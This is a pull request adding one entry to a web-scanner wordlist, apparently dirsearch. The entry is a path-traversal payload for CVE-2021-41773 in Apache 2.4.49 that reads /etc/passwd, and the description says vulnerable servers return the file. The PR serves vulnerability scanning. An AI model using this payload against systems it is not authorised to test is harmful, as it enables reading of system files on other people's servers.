### PR TITLE
Added CVE-2021-41773

### DIFF
--- a/db/dicc.txt
+++ b/db/dicc.txt
@@ -4192,6 +4192,7 @@ cgi
 cgi-admin
 cgi-bin
 cgi-bin/
+cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
 cgi-bin/a1stats/a1disp.cgi
 cgi-bin/awstats.pl
 cgi-bin/awstats/


### PR DESCRIPTION
Added CVE-2021-41773 (Path Traversal vulnerability in Apache 2.4.49)
Vulnerable systems will return 200 OK response with contents of /etc/passwd

Description
---------------

What will it do?

If this PR will fix an issue, please address it:
Fix #{issue}

Requirements
---------------

- [ ] Add your name to `CONTRIBUTERS.md`
- [ ] If this is a new feature, then please add some additional information about it to `CHANGELOG.md`
